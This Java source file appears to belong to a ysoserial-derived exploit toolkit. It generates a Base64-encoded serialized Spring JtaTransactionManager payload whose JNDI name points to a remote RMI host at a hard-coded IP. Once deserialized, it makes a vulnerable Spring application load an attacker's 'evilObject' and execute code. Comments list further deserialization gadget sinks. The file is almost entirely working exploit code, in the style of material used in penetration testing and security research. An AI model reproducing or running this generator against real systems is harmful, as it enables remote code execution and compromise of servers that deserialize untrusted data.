package ysoserial.exploit.jndi;

import org.springframework.transaction.jta.JtaTransactionManager;
import ysoserial.payloads.annotation.Dependencies;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.net.Socket;
import java.util.Base64;

/**
 * @ClassName: JNDIInjection
 * @Description:
 * https://www.veracode.com/blog/research/exploiting-jndi-injections-java
 * https://www.iswin.org/2016/01/24/Spring-framework-deserialization-RCE-%E5%88%86%E6%9E%90%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/
 * https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
 * @Author: angelwhu
 * @Create: 2019/03/06 15:16
 **/
@Dependencies({"Spring Framework 4.2.4,spring-tx,spring-contex,javax.transaction"})
public class JNDIInjection {
    public static void generatePayload() throws Exception {
        // jndi的调用地址
        String jndiAddress = "rmi://39.106.143.48:1389/evilObject";
        // 实例化JtaTransactionManager对象，并且初始化UserTransactionName成员变量
        JtaTransactionManager object = new JtaTransactionManager();
        object.setUserTransactionName(jndiAddress);

        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(object);
        System.out.println(Base64.getEncoder().encodeToString(out.toByteArray()));

        //javax.management.remote.rmi.RMIConnector.connect();
        //org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName
        //com.sun.rowset.JdbcRowSetImpl.execute()
        //org.springframework.transaction.jta.JtaTransactionManager.readObject()
    }

    public static void main(String[] args) throws Exception {
        generatePayload();
    }
}
